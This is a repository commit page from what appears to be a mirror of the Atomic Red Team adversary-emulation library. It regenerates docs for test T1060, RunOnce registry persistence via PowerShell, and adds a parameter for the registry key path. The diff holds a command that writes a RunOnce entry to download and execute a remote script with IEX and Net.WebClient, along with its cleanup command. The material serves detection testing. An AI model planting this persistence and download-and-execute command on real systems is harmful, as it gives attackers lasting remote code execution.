security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-03-02 20:31:47 +00:00
parent aae45a1937
commit 877da0ba7d
2 changed files with 12 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1060/T1060.md
+4 -3
View File
@@ -114,17 +114,18 @@ RunOnce Key Persistence via PowerShell
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | powershell.exe|
| reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
```
#### Cleanup Commands:
```
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
```
atomics/index.yaml
+8 -3
View File
@@ -3785,13 +3785,18 @@ persistence:
description: Thing to Run
type: Path
default: powershell.exe
reg_key_path:
description: Path to registry key to update
type: Path
default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
executor:
name: powershell
elevation_required: true
command: |
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
cleanup_command: 'Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
-ErrorAction Ignore
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
-Force -ErrorAction Ignore
'
T1053: